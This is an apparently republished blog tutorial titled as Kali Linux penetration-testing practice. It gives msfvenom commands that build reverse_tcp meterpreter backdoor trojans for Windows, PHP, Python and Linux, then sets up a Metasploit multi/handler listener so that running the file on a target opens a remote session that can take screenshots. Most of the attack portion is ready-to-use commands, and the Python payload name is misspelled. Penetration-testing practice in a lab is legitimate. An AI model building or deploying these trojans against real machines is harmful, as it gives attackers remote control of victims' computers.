Kali Linux penetration testing small practice - Metasploit and backdoor Trojan

Others 2023-05-05 14:24:47 views: null

Table of contents

1. Environment and tool preparation

1.Metasploit

2. Kali Linux and target machine

2. Practice process

1. Open Kali Linux and enter the terminal

2. Enter the command to generate the Trojan horse and configure the relevant parameters

1. Environment and tool preparation

1.Metasploit

Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments to provide real security risk intelligence. These features include intelligent development, code auditing, web application scanning, social engineering. The team worked together to present their findings in Metasploit and a comprehensive report.

2. Kali Linux and target machine

Include as many penetration and auditing tools as possible in one practical toolkit. Kali achieves this goal. Most open source tools for security testing are included.

2. Practice process

1. Open Kali Linux and enter the terminal

Enter msfconsole

 screen after entering

​ 

2. Enter the command to generate the Trojan horse and configure the relevant parameters

Here for the windows system, use the Windows Trojan generation command:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP地址 lport=端口 -f exe -o 文件名.exe

The Trojan generation commands for other related systems are as follows:

1.PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=kali的IP LPORT=端口 -f raw -o 文件名.php

2.Python后门
msfvenom -p python/meterpreter/reverser_tcp LHOST=kali的IP地址 LPORT=端口 -f  raw > shell.py

3.Linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=端口 -f elf > shell.elf

Enter the command in the command line. Note that the lhost here is the IP address of kali, and the lport is the open port of the target machine. After the generation is successful, the following command line will prompt

 After generation, it can be found in the main directory of the system, and then copied to the target machine

 Then enter Metasploit alone, use the exploit/multi/handler module to set the attack load, run after the setting is complete, and attack

use exploit/multi/handler

At this time, click the Trojan horse file on the target machine. After clicking, it will automatically connect to the line, and Metasploit will display meterpreter. At this time, you can use other commands to operate. You can use screenshot to capture the current screen status. The picture is in the kali main directory.

Guess you like

Origin blog.csdn.net/qq_60503432/article/details/128590864
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com